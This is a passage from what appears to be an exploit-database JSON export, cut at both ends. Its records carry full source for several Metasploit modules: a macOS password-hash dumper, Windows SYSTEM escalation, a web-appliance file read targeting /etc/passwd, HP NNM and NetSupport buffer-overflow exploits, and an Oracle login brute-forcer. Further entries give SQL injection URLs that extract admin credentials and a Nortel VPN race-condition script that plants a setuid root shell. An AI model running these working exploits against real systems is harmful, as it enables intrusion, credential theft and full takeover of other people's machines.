\"LM\"\n private_data = \"#{hash}:#{Metasploit::Credential::NTLMHash::BLANK_NT_HASH}\"\n private_type = :ntlm_hash\n jtr_format = 'lm'\n when \"SHA-512 PBKDF2\"\n private_data = hash\n private_type = :nonreplayable_hash\n jtr_format = 'PBKDF2-HMAC-SHA512'\n when \"SHA-512\"\n private_data = hash\n private_type = :nonreplayable_hash\n jtr_format = 'xsha512'\n when \"SHA-1\"\n private_data = hash\n private_type = :nonreplayable_hash\n jtr_format = 'xsha'\n end\n create_credential(\n jtr_format: jtr_format,\n workspace_id: myworkspace_id,\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: user,\n private_data: private_data,\n private_type: private_type\n )\n print_status(\"Credential saved in database.\")\n end\n\n # @return [String] containing blob for ShadowHashData in user's plist\n # @return [nil] if shadow is invalid\n def grab_shadow_blob(user)\n shadow_bytes = cmd_exec(\"dscl . read /Users/#{user} dsAttrTypeNative:ShadowHashData\").gsub(/\\s+/, '')\n return nil unless shadow_bytes.start_with? 'dsAttrTypeNative:ShadowHashData:'\n # strip the other bytes\n shadow_bytes.sub!(/^dsAttrTypeNative:ShadowHashData:/, '')\n end\n\n # @return [String] version string (e.g. 
10.8.5)\n def ver_num\n @product_version ||= get_sysinfo['ProductVersion']\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/osx/gather/hashdump.rb"}, {"lastseen": "2019-11-24T05:35:56", "bulletinFamily": "exploit", "description": "This module uses the builtin 'getsystem' command to escalate the current session to the SYSTEM account from an administrator user account.\n", "modified": "2017-07-24T13:26:21", "published": "2011-11-11T22:19:49", "id": "MSF:POST/WINDOWS/ESCALATE/GETSYSTEM", "href": "", "type": "metasploit", "title": "Windows Escalate Get System via Administrator", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasm'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Priv\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Escalate Get System via Administrator',\n 'Description' => %q{\n This module uses the builtin 'getsystem' command to escalate\n the current session to the SYSTEM account from an administrator\n user account.\n },\n 'License' => MSF_LICENSE,\n 'Author' => 'hdm',\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n\n register_options([\n OptInt.new('TECHNIQUE', [false, \"Specify a particular technique to use (1-4), otherwise try them all\", 0])\n ])\n\n end\n\n def unsupported\n print_error(\"This platform is not supported with this script!\")\n raise Rex::Script::Completed\n end\n\n def run\n\n technique = datastore['TECHNIQUE'].to_i\n\n unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86)\n\n if is_system?\n print_good(\"This session already has SYSTEM privileges\")\n return\n end\n\n begin\n result = client.priv.getsystem(technique)\n print_good(\"Obtained SYSTEM via technique #{result[1]}\")\n rescue 
Rex::Post::Meterpreter::RequestError => e\n print_error(\"Failed to obtain SYSTEM access\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/escalate/getsystem.rb"}, {"lastseen": "2019-12-02T14:16:50", "bulletinFamily": "exploit", "description": "This module abuses the 'mimencode' binary present within ContentKeeper Web filtering appliances to retrieve arbitrary files outside of the webroot.\n", "modified": "2017-11-08T16:00:24", "published": "2011-04-10T15:27:17", "id": "MSF:AUXILIARY/ADMIN/HTTP/CONTENTKEEPER_FILEACCESS", "href": "", "type": "metasploit", "title": "ContentKeeper Web Appliance mimencode File Access", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'ContentKeeper Web Appliance mimencode File Access',\n 'Description' => %q{\n This module abuses the 'mimencode' binary present within\n ContentKeeper Web filtering appliances to retrieve arbitrary\n files outside of the webroot.\n },\n 'References' =>\n [\n [ 'OSVDB', '54551' ],\n [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],\n ],\n 'Author' => [ 'aushack' ],\n 'License' => MSF_LICENSE)\n\n register_options(\n [\n OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),\n OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),\n ])\n end\n\n def run_host(ip)\n begin\n tmpfile = Rex::Text.rand_text_alphanumeric(20) # Store the base64 encoded traveral data in a hard-to-brute filename, just in case.\n\n print_status(\"Attempting to connect to #{rhost}:#{rport}\")\n res = send_request_raw(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['URL']) + '?-o+' + 
'/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],\n }, 25)\n\n if (res and res.code == 500)\n\n print_good(\"Request appears successful on #{rhost}:#{rport}! Response: #{res.code}\")\n\n file = send_request_raw(\n {\n 'method' => 'GET',\n 'uri' => '/' + tmpfile,\n }, 25)\n\n if (file and file.code == 200)\n print_status(\"Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\\r\\n#{Rex::Text.decode_base64(file.body)}\")\n elsif (file and file.code)\n print_error(\"Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \\r\\n#{res.body}\")\n end\n elsif (res and res.code)\n print_error(\"Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \\r\\n#{res.body}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n rescue ::Timeout::Error, ::Errno::EPIPE\n\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/contentkeeper_fileaccess.rb"}, {"lastseen": "2019-12-06T23:31:29", "bulletinFamily": "exploit", "description": "This module exploits NNM's nnmRptConfig.exe. 
Similar to other NNM CGI bugs, the overflow occurs during a ov.sprintf_new() call, which allows an attacker to overwrite data on the stack, and gain arbitrary code execution.\n", "modified": "2017-07-24T13:26:21", "published": "2011-03-23T21:35:13", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_NNMRPTCONFIG_SCHDPARAMS", "href": "", "type": "metasploit", "title": "HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Seh\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow\",\n 'Description' => %q{\n This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs,\n the overflow occurs during a ov.sprintf_new() call, which allows an attacker to\n overwrite data on the stack, and gain arbitrary code execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'References' =>\n [\n ['CVE', '2011-0267'],\n ['OSVDB', '70473'],\n ['ZDI', '11-009'],\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x26\\x2b\",\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"seh\",\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'NNM 7.53 - Windows Server 2003 Ent', {\n 'Ret' => 0x5A30532D, #POP/POP/RET OvWww.dll\n 'Offset' => 46919, #Offset to SEH chain\n 'Pops' => 13, #Number of POPADs needed to find a bigger space with our payload\n 'Payloadoffset' => 57, #Offset to the payload\n }],\n ],\n 'DisclosureDate' => \"Jan 10 2011\"))\n end\n\n def exploit\n nops = make_nops(1000)*70\n\n sploit = nops[0, target['Offset']]\n sploit << generate_seh_record(target.ret)\n sploit << \"\\x61\"*target['Pops']\n sploit << \"\\xff\\xe1\" 
#JMP ECX\n sploit << nops[0, target['Payloadoffset']]\n sploit << payload.encoded\n sploit << nops[0, 70000-sploit.length]\n\n data = \"Content&Action=Create&\"\n data << \"Template=Avail/CRAvail&\"\n data << \"Operation=Apply&\"\n data << \"Params=schdParams+nameParams&\"\n data << \"schdParams=#{sploit}%7Cmonthtodate&\"\n data << \"nameParams=text1%3DAAAA%26text2%3Dtest2test%26text3%3Dtest2 HTTP/1.1\"\n\n connect\n send_request_raw({\n 'uri' => '/OvCgi/nnmRptConfig.exe',\n 'data' => data,\n 'version' => '1.1',\n 'method' => 'POST',\n 'headers' => {\n 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language' => 'en-us,en;q=0.5',\n 'Accept-Encoding' => 'gzip,deflate',\n 'Accept-Chrarset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',\n 'Keep-Alive' => '300',\n 'Connection' => 'Keep-Alive',\n 'Cache-Control' => 'mag-age=0',\n 'Content-Type' => 'application/x-www-form-urlencoded',\n }\n }, 3)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb"}, {"lastseen": "2019-12-09T09:01:21", "bulletinFamily": "exploit", "description": "This module attempts to authenticate against an Oracle RDBMS instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n", "modified": "2019-10-05T18:13:38", "published": "2011-03-14T14:41:46", "id": "MSF:AUXILIARY/SCANNER/ORACLE/ORACLE_LOGIN", "href": "", "type": "metasploit", "title": "Oracle RDBMS Login Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Nmap\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n\n # Creates an instance 
of this module.\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle RDBMS Login Utility',\n 'Description' => %q{\n This module attempts to authenticate against an Oracle RDBMS\n instance using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n },\n 'Author' => [\n 'Patrik Karlsson <patrik[at]cqure.net>', # the nmap NSE script, oracle-brute.nse\n 'todb' # this Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.oracle.com/us/products/database/index.html' ],\n [ 'CVE', '1999-0502'], # Weak password CVE\n [ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html']\n ]\n ))\n\n register_options(\n [\n OptPath.new('USERPASS_FILE', [ false, \"File containing (space-separated) users and passwords, one pair per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"oracle_default_userpass.txt\") ]),\n OptString.new('SID', [ true, 'The instance (SID) to authenticate against', 'XE'])\n ])\n\n end\n\n def minimum_nmap_version\n \"5.50\"\n end\n\n def run\n unless nmap_version_at_least? minimum_nmap_version\n print_error \"Installed Nmap version is not at least #{minimum_nmap_version}. 
Exiting...\"\n return false\n end\n print_status \"Nmap: Setting up credential file...\"\n credfile = create_credfile\n cred_count = 0\n each_user_pass(true) {|user, pass| credfile[0].puts \"%s/%s\" % [user,pass]; cred_count += 1 }\n credfile[0].flush\n nmap_build_args(credfile[1])\n print_status \"Nmap: Starting Oracle bruteforce with #{cred_count} credentials against SID '#{sid}'...\"\n nmap_run\n credfile[0].unlink\n if Rex::Parser.nokogiri_loaded\n nmap_hosts {|type,data| process_nokogiri_callback(type,data)}\n else\n nmap_hosts {|host| process_host(host)}\n end\n end\n\n def sid\n datastore['SID'].to_s\n end\n\n def nmap_build_args(credpath)\n nmap_reset_args\n nmap_append_arg \"-P0\"\n nmap_append_arg \"--script oracle-brute\"\n script_args = [\n \"tns.sid=#{sid}\",\n \"brute.mode=creds\",\n \"brute.credfile=#{credpath}\",\n \"brute.threads=1\"\n ]\n script_args << \"brute.delay=#{set_brute_delay}\"\n nmap_append_arg \"--script-args \\\"#{script_args.join(\",\")}\\\"\"\n nmap_append_arg \"-n\"\n nmap_append_arg \"-v\" if datastore['VERBOSE']\n end\n\n # Sometimes with weak little 10g XE databases, you will exhaust\n # available processes from the pool with lots and lots of\n # auth attempts, so use bruteforce_speed to slow things down\n def set_brute_delay\n case datastore[\"BRUTEFORCE_SPEED\"]\n when 4; 0.25\n when 3; 0.5\n when 2; 1\n when 1; 15\n when 0; 60 * 5\n else; 0\n end\n end\n\n def create_credfile\n outfile = Rex::Quickfile.new(\"msf3-ora-creds-\")\n if Rex::Compat.is_cygwin and self.nmap_bin =~ /cygdrive/i\n outfile_path = Rex::Compat.cygwin_to_win32(outfile.path)\n else\n outfile_path = outfile.path\n end\n @credfile = [outfile,outfile_path]\n end\n\n def process_nokogiri_callback(type,data)\n return unless type == :port_script\n return unless data[\"id\"] == \"oracle-brute\"\n return unless data[:addresses].has_key? 
\"ipv4\"\n return unless data[:port][\"state\"] == ::Msf::ServiceState::Open\n addr = data[:addresses][\"ipv4\"].to_s\n port = data[:port][\"portid\"].to_i\n output = data[\"output\"]\n parse_script_output(addr,port,output)\n end\n\n def process_host(h)\n h[\"ports\"].each do |p|\n next if(h[\"scripts\"].nil? || h[\"scripts\"].empty?)\n h[\"scripts\"].each do |id,output|\n next unless id == \"oracle-brute\"\n parse_script_output(h[\"addr\"],p[\"portid\"],output)\n end\n end\n end\n\n def extract_creds(str)\n m = str.match(/\\s+([^\\s]+):([^\\s]+) =>/)\n m[1,2]\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: opts[:status],\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def parse_script_output(addr,port,output)\n msg = \"#{addr}:#{port} - Oracle -\"\n @oracle_reported = false\n if output =~ /TNS: The listener could not resolve \\x22/n\n print_error \"#{msg} Invalid SID: #{sid}\"\n elsif output =~ /Accounts[\\s]+No valid accounts found/nm\n print_status \"#{msg} No valid accounts found\"\n else\n output.each_line do |oline|\n if oline =~ /Login correct/\n if not @oracle_reported\n report_service(:host => addr, :port => port, :proto => \"tcp\", :name => \"oracle\")\n report_note(:host => addr, :port => port, :proto => \"tcp\", :type => \"oracle.sid\", :data => sid, :update => :unique_data)\n @oracle_reported = true\n end\n user,pass = extract_creds(oline)\n pass = \"\" if pass == \"<empty>\"\n print_good \"#{msg} Success: #{user}:#{pass} (SID: #{sid})\"\n report_cred(\n ip: addr,\n port: port,\n user: \"#{sid}/#{user}\",\n password: 
pass,\n service_name: 'tcp',\n status: Metasploit::Model::Login::Status::SUCCESSFUL\n )\n elsif oline =~ /Account locked/\n if not @oracle_reported\n report_service(:host => addr, :port => port, :proto => \"tcp\", :name => \"oracle\")\n report_note(:host => addr, :port => port, :proto => \"tcp\", :type => \"oracle.sid\", :data => sid, :update => :unique_data)\n @oracle_reported = true\n end\n user = extract_creds(oline)[0]\n print_good \"#{msg} Locked: #{user} (SID: #{sid}) -- account valid but locked\"\n report_cred(\n ip: addr,\n port: port,\n user: \"#{sid}/#{user}\",\n service_name: 'tcp',\n status: Metasploit::Model::Login::Status::DENIED_ACCESS\n )\n elsif oline =~ /^\\s+ERROR: (.*)/\n print_error \"#{msg} NSE script error: #{$1}\"\n end\n end\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/oracle/oracle_login.rb"}, {"lastseen": "2019-12-06T23:27:35", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in NetSupport Manager Agent. It uses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.\n", "modified": "2018-09-15T23:54:45", "published": "2011-03-03T01:04:24", "id": "MSF:EXPLOIT/LINUX/MISC/NETSUPPORT_MANAGER_AGENT", "href": "", "type": "metasploit", "title": "NetSupport Manager Agent Remote Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NetSupport Manager Agent Remote Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in NetSupport Manager Agent. 
It\n uses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.\n },\n 'Author' =>\n [\n 'Luca Carettoni (@_ikki)', # original discovery / exploit\n 'Evan', # ported from exploit-db exploit\n 'jduck' # original proftpd_iac ROP, minor cleanups\n ],\n 'Arch' => ARCH_X86,\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-0404' ],\n [ 'OSVDB', '70408' ],\n [ 'BID', '45728' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2011/Jan/90' ],\n [ 'EDB', '15937' ]\n ],\n 'Privileged' => true,\n 'Platform' => 'linux',\n 'Payload' =>\n {\n 'Space' => 0x975,\n 'BadChars' => \"\",\n 'DisableNops' => true,\n },\n 'Targets' =>\n [\n [ 'linux',\n {\n 'Ret' => 0x0805e50c, # pop eax ; pop ebx ; pop ebp ;;\n 'Pad' => 975,\n 'RopStack' =>\n [\n ### mmap isn't used in the binary so we need to resolve it in libc\n 0x00041160, # mmap64 - localtime\n 0xa9ae0e6c, # 0x8092b30 - 0x5e5b1cc4, localtime will become mprotect\n 0xcccccccc,\n 0x08084662, # add DWORD PTR [ebx+0x5e5b1cc4],eax; pop edi; pop ebp ;;\n 0xcccccccc,\n 0xcccccccc,\n 0x080541e4, # localtime@plt (now mmap64)\n 0x080617e3, # add esp 0x10 ; pop ebx ; pop esi ; pop ebp ;;\n 0, 0x20000, 0x7, 0x22, 0xffffffff, 0, # mmap64 arguments\n 0x0, # unused\n 0x08066332, # pop edx; pop ebx; pop ebp ;;\n \"\\x89\\x1c\\xa8\\xc3\".unpack('V').first, # mov [eax+ebp*4], ebx\n 0xcccccccc,\n 0xcccccccc,\n 0x080555c4, # mov [eax] edx ; pop ebp ;;\n 0xcccccccc,\n #0x0807385a, # push eax ; adc al 0x5d ;;\n\n ### this is the stub used to copy shellcode from the stack to\n ### the newly mapped executable region\n #\\x8D\\xB4\\x24\\x7D\\xFB\\xFF # lea esi,[dword esp-0x483]\n #\\x8D\\x78\\x12 # lea edi,[eax+0x12]\n #\\x6A\\x7F # push byte +0x7f\n #\\x59 # pop ecx\n #\\xF3\\xA5 # rep movsd\n\n ### there are no good jmp eax so overwrite getrlimits GOT entry\n 0x0805591b, # pop ebx; pop ebp ;;\n 0x08092d68 - 0x4, # 08092d68 0002f007 R_386_JUMP_SLOT 00000000 getrlimit\n 0x1, # becomes ebp\n 0x08084f38, # mov 
[ebx+0x4] eax ; pop ebx ; pop ebp ;;\n 0xfb7c24b4, # become eb\n 0x01,\n 0x08054ac4, # <getrlimit@plt>\n 0x0805591b, # pop ebx; pop ebp ;;\n #0xffff8d78, # become ebx\n 0x788dffff,\n 0x2,\n 0x08054ac4, # <getrlimit@plt>\n 0x0805591b, # pop ebx; pop ebp ;;\n 0x597f6a12,\n 0x3,\n 0x08054ac4, # <getrlimit@plt>\n 0x0805591b, # pop ebx; pop ebp ;;\n 0x9090a5f2,\n 0x4,\n 0x08054ac4, # <getrlimit@plt>\n 0x0805591b, # pop ebx; pop ebp ;;\n 0x8d909090,\n 0x0,\n 0x08054ac4, # <getrlimit@plt>\n 0xcccccccc,\n 0x01010101,\n ]\n }\n ]\n ],\n 'DisclosureDate' => 'Jan 8 2011',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(5405),\n ])\n end\n\n def exploit\n connect\n\n #pop_eax_ebx ;\n #0x8084662 # add DWORD PTR [ebx+0x5e5b1cc4],eax ;;\n triggerA = \"\\x15\\x00\\x5a\\x00\" + \"\\x41\" * 1024 + \"\\x00\\x00\\x00\" +\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n triggerB = \"\\x25\\x00\\x51\\x00\\x81\\x41\\x41\\x41\\x41\\x41\\x41\\x00\" +\n \"\\x41\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\n \"\\x00\\x00\\x00\"\n\n triggerC = \"\\x37\\x00\\x03\\x00\\x0a\\x00\\x00\\x00\\x00\\x00\\x58\\xb4\" +\n \"\\x92\\xff\\x00\\x00\\x69\\x6b\\x6b\\x69\\x00\\x57\\x4f\\x52\" +\n \"\\x4b\\x47\\x52\\x4f\\x55\\x50\\x00\\x3c\\x3e\" + #pleasure trail\n #\"\\xcc\" +\n \"\\x90\" +\n payload.encoded +\n \"\\xcc\" * (target['Pad'] - payload.encoded.length) +\n [target.ret].pack('V')\n\n new = ''\n if target['RopStack']\n new << target['RopStack'].map { |e|\n if e == 0xcccccccc\n rand_text(4).unpack('V').first\n else\n e\n end\n }.pack('V*')\n end\n\n triggerC << new\n triggerC << \"\\x00\" * 4\n triggerC << \"\\x00\\x00\\x31\\x32\\x2e\\x36\\x32\\x2e\\x31\\x2e\\x34\\x32\"\n triggerC << \"\\x30\\x00\\x31\\x30\\x00\\x00\"\n\n triggerD = \"\\x06\\x00\\x07\\x00\\x20\\x00\\x00\\x00\\x0e\\x00\\x32\\x00\" +\n \"\\x01\\x10\\x18\\x00\\x00\\x01\\x9f\\x0d\\x00\\x00\\xe0\\x07\" +\n 
\"\\x06\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x4e\\x00\" +\n \"\\x02\\x00\\xac\\x00\\x04\\x00\\x7f\\x00\\x00\\x00\"\n\n print_status(\"Sending A\")\n sock.put(triggerA)\n select(nil, nil, nil, 1)\n\n print_status(\"Sending B\")\n sock.put(triggerB)\n select(nil, nil, nil, 1)\n\n print_status(\"Sending C\")\n sock.put(triggerC)\n select(nil, nil, nil, 1)\n\n print_status(\"Sending D\")\n sock.put(triggerD)\n select(nil, nil, nil, 1)\n\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/netsupport_manager_agent.rb"}], "zdt": [{"lastseen": "2018-03-12T22:08:52", "bulletinFamily": "exploit", "description": "Exploit for asp platform in category web applications", "modified": "2010-05-20T00:00:00", "published": "2010-05-20T00:00:00", "id": "1337DAY-ID-12320", "href": "https://0day.today/exploit/description/12320", "type": "zdt", "title": "Renista CMS SQL Injection Vulnerability", "sourceData": "=======================================\r\nRenista CMS SQL Injection Vulnerability\r\n=======================================\r\n\r\n\r\nTest on CMS Owner site :http://www.rayaco.com \r\n \r\n# db name :\r\nhttp://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,db_name())--\r\n \r\n# cont user :\r\nhttp://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(count(*) as nvarchar(4000))%2bchar(126) FROM Portal_BehPardazco..TBAdmin ))--\r\n \r\n# username :\r\nhttp://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(UserName as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--\r\n \r\n# password :\r\nhttp://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(Password as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--\r\n# 
name :\r\nhttp://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(Name as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--\r\n========================\r\nI tried and finally find bug at this CMS ( Renista ) but i dont wanna any damage for the company, just for fun and NOTIFICATION .\r\n \r\nSpecial thanks to llvllr_special ,shabgard.org,Emperor, and other Iranian Hecker ...\r\n\r\n\n\n# 0day.today [2018-03-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/12320"}, {"lastseen": "2018-03-01T03:33:40", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2007-02-21T00:00:00", "published": "2007-02-21T00:00:00", "id": "1337DAY-ID-7633", "href": "https://0day.today/exploit/description/7633", "type": "zdt", "title": "Nortel SSL VPN Linux Client <= 6.0.3 Local Privilege Escalation Exploit", "sourceData": "=======================================================================\r\nNortel SSL VPN Linux Client <= 6.0.3 Local Privilege Escalation Exploit\r\n=======================================================================\r\n\r\n\r\n\r\n#!/bin/sh\r\n# \r\n# Nortel SSL VPN Linux Client race condition\r\n# \r\n# Jon Hart <[email\u00a0protected]>\r\n#\r\n# The Linux client that is utilized by versions priot to 6.05 of the Nortel\r\n# SSL VPN appliance suffers from a number of problems that, in combination,\r\n# allow an unprivileged local user to obtain root privileges.\r\n# \r\n# This particular bug is as follows:\r\n# 1) SSL VPN is initiated from the startNetdirect() javascript call\r\n# 2) A zip archive is downloaded to the local machine which contains three\r\n# binaries necessary for the client: askpass, client, and surun. 
This\r\n# archive is written to /tmp, chmod'd 777, and then it is extracted into\r\n# /tmp/NetClient\r\n# 3) All of these files are chmod'd world writable by the following java\r\n# snippet, which is called on all UNIX client OSs:\r\n#\r\n# protected boolean setPermissions(String file)\r\n# {\r\n# String command = \"chmod a+xw \" + file;\r\n# try\r\n# {\r\n# Process p = Runtime.getRuntime().exec(command);\r\n# p.waitFor();\r\n# }\r\n# ...\r\n# }\r\n#\r\n# 4) /tmp/NetClient/surun is executed, which in turn runs\r\n# /tmp/NetClient/askpass. This process aquires the root password, and\r\n# then executes /tmp/NetClient/client via /bin/su and the root password. \r\n#\r\n# There is clearly a bug in step 2 and 3 whereby files are installed world\r\n# writable. The bug I chose to exploit is the race condition in step 4,\r\n# combined with the insecure permissions of steps 2 and 3, which (IMO),\r\n# gives root more easily. The risk here is if you have untrusted accounts\r\n# on the machine from which you access the Nortel VPN, those accounts can\r\n# easily gain local root access.\r\n#\r\n# The exploit is fairly simple. Wait for /tmp/NetClient/client to appear,\r\n# swap it for our \"special version\", and wait for a shell.\r\n#\r\n# Notes: a /tmp with nosuid will help mitigate this particular _exploit_,\r\n# but not the vulnerability. The same vulnerability also exists in the Mac\r\n# client. \r\n#\r\n# For education and testing purposes only. 
Only run this on systems that\r\n# you maintain/control.\r\n#\r\n\r\ncleanup() {\r\n rm -f $TMP_DIR/.*-$$\\..*\r\n}\r\n\r\n\r\nrun_cmd() {\r\n [email\u00a0protected] \r\n VPN_CLIENT_RUN=`mktemp -t vpn_client_run-$$.XXXXXXXX`\r\n\r\n echo \"Waiting for writable client\"\r\n while (true); do\r\n if [ -w $CLIENT ]; then\r\n OLD_CLIENT=`mktemp -t old_client-$$.XXXXXXXXXX`\r\n echo \"Saving old client\"\r\n cp $CLIENT $OLD_CLIENT \r\n chmod 755 $OLD_CLIENT\r\n echo \"Writing new \\\"client\\\"\"\r\n echo \"#!/bin/sh\" > $CLIENT \r\n echo \"$CMD\" >> $CLIENT\r\n echo \"rm -f $VPN_CLIENT_RUN\" >> $CLIENT\r\n # ensure the original client gets run so as to \r\n # not alert the user\r\n echo \"exec $OLD_CLIENT \\[email\u00a0protected]\" >> $CLIENT\r\n break\r\n fi\r\n done\r\n\r\n SUCCESS=0\r\n echo \"Waiting for new client to be run\"\r\n while (true); do\r\n if [ ! -f $VPN_CLIENT_RUN ]; then\r\n SUCCESS=1\r\n break\r\n else\r\n sleep 2\r\n fi\r\n done\r\n\r\n if [ $SUCCESS == 1 ]; then\r\n echo \"Success\"\r\n return 0\r\n else \r\n echo \"Exploit failed!\"\r\n cleanup\r\n exit 1\r\n fi\r\n}\r\n\r\nsuid_shell() {\r\n SH_C=\"sh_c-$$.c\"\r\n\r\n # write out setuid shell\r\n cat >> $SH_C << EOF\r\n #include <sys/types.h>\r\n #include <unistd.h>\r\n int main (int argc, char **argv) {\r\n setuid(0);\r\n setgid(0);\r\n execl(\"/bin/bash\", \"bash\", NULL);\r\n }\r\nEOF\r\n\r\n # try like hell to get this shell compiled\r\n SH=`mktemp -t vpnshell-$$.XXXXXXXXXX`\r\n gcc -o $SH $SH_C 2>&1 > /dev/null 2>&1\r\n if [ $? != 0 ]; then\r\n cc -o $SH $SH_C 2>&1 > /dev/null 2>&1\r\n if [ $? 
